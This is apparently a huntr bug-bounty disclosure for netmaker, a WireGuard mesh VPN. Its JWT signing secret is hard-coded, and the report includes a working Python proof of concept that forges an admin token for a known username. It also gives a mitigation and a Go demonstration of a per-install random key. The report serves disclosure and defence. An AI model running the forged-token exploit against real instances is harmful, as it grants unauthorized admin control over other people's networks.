huntr | mrsuicideparrot | 29898A42-FD4F-4B5B-A8E3-AB573CB87EAC
History: Feb 10, 2022 - 10:32 p.m.

in gravitl/netmaker

www.huntr.dev
Tags: netmaker, wireguard, mesh vpn, jwt, hardcoded, admin privileges, exploit, vulnerability, mitigation, bug bounty

EPSS: 0.002
Percentile: 61.8%

Description

Netmaker is an application that enables easy deployment of a mesh VPN based on WireGuard.

JWT tokens are used to authenticate and manage users throughout the application.

The secret key used to sign these tokens is hard-coded in the source, so anyone who reads the code can forge tokens. An attacker can therefore mint a valid token for any user and set the IsAdmin claim in it; because the privilege checks trust the claims carried by the token, the forged token is accepted with admin privileges.

Proof of Concept

To exploit this vulnerability it is necessary to know an existing username.

Instructions:

  1. Change the username and netmaker_api variables to an existing username and the API URL of your instance.

  2. Run the exploit below.

from requests import post
import jwt  # pip3 install pyjwt

username = 'cenas1'  # CHANGEME: an existing username on the target instance
netmaker_api = "https://api.nm.1-7-8-9.nip.io:443"  # CHANGEME: the API URL of your instance

netmaker_url = netmaker_api + "/api/networks"

# The signing secret shipped in the netmaker source. Knowing it lets anyone mint valid tokens.
hardcoded_secretKey = '(BytesOverTheWire)'

# Forge a token that claims admin rights for the chosen user.
encoded_jwt = jwt.encode({
  "IsAdmin": True,
  "UserName": username,
  "Networks": [],
}, hardcoded_secretKey, algorithm='HS256')

# PyJWT 1.x returns bytes and 2.x returns str; normalise so the header is a str either way.
if isinstance(encoded_jwt, bytes):
    encoded_jwt = encoded_jwt.decode()

headers = {"Authorization": "Bearer " + encoded_jwt}

# Create a network, an admin-only action, to prove the forged token is honoured.
d_json = {
  "addressrange": "10.134.2.0/24",
  "addressrange6": "",
  "defaultudpholepunch": "yes",
  "isdualstack": "no",
  "islocal": "no",
  "localrange": "",
  "netid": "illegalnet",
}

r = post(netmaker_url, headers=headers, json=d_json)
print(r.status_code, r.text)  # a successful response means the forged token was accepted

  3. Go to the Networks tab in the netmaker-ui and check whether a new network called illegalnet was created.

Impact

An attacker who knows the username of any valid user can perform any action with admin privileges.

Possible mitigation

Generate a random JWT signing key during installation (for example on first start) and store it in the instance's configuration instead of shipping a fixed value in the source, so that every deployment has its own secret.
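As an added illustration of the flaw and of the proposed mitigation (example code written for this page, not netmaker's own), the Go program below implements a minimal HS256 JWT signer and verifier with only the standard library, standing in for the JWT library the project uses. It forges the same IsAdmin token as the proof of concept and shows that the token is accepted when the server verifies with the hard-coded key, but rejected once the server verifies with a key generated by crypto/rand at install time. The Claims fields and the key value mirror the proof of concept; the function names are this example's own.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Claims mirrors the payload forged in the proof of concept above.
type Claims struct {
	IsAdmin  bool     `json:"IsAdmin"`
	UserName string   `json:"UserName"`
	Networks []string `json:"Networks"`
}

// HardcodedKey is the vulnerable pattern: a fixed signing secret in the source
// (the value from the proof of concept). Anyone who reads it can mint valid tokens.
const HardcodedKey = "(BytesOverTheWire)"

var b64 = base64.RawURLEncoding

// NewRandomKey is the mitigation: 32 bytes from crypto/rand, generated once at
// install time and kept in the instance's configuration, not in source control.
func NewRandomKey() ([]byte, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	return key, nil
}

// Sign produces an HS256 JWT (header.payload.signature) over claims with key.
func Sign(claims Claims, key []byte) (string, error) {
	payload, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	input := b64.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + b64.EncodeToString(payload)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(input))
	return input + "." + b64.EncodeToString(mac.Sum(nil)), nil
}

// Verify checks the token's signature with key and returns its claims. The algorithm is
// pinned to HS256 ("alg":"none" is refused) and the MACs are compared in constant time.
func Verify(token string, key []byte) (*Claims, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	raw := make([][]byte, 3) // decoded header, payload, signature
	for i, p := range parts {
		var err error
		if raw[i], err = b64.DecodeString(p); err != nil {
			return nil, errors.New("bad base64url in token")
		}
	}
	var header struct{ Alg string `json:"alg"` }
	if json.Unmarshal(raw[0], &header) != nil || header.Alg != "HS256" {
		return nil, errors.New("unexpected alg")
	}
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(raw[2], mac.Sum(nil)) {
		return nil, errors.New("invalid signature")
	}
	var claims Claims
	if err := json.Unmarshal(raw[1], &claims); err != nil {
		return nil, err
	}
	return &claims, nil
}

// ForgeAdminToken is the attacker's step: an IsAdmin=true token for a known username, signed with the hard-coded key.
func ForgeAdminToken(username string) string {
	tok, _ := Sign(Claims{IsAdmin: true, UserName: username, Networks: []string{}}, []byte(HardcodedKey))
	return tok
}

// AcceptedAsAdmin reports whether a server verifying with serverKey would honour the token as an admin session.
func AcceptedAsAdmin(token string, serverKey []byte) bool {
	c, err := Verify(token, serverKey)
	return err == nil && c.IsAdmin
}

func main() {
	forged := ForgeAdminToken("cenas1")
	fmt.Println("hard-coded key accepts forged admin token:", AcceptedAsAdmin(forged, []byte(HardcodedKey)))
	key, err := NewRandomKey()
	if err != nil {
		panic(err)
	}
	fmt.Println("per-install random key accepts it:", AcceptedAsAdmin(forged, key))
}
```

The random key only helps if it is persisted outside the source tree and never logged or committed; the first line of defence is that no two deployments share a secret, so a key read from one instance (or from the public repository) is worthless against any other.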
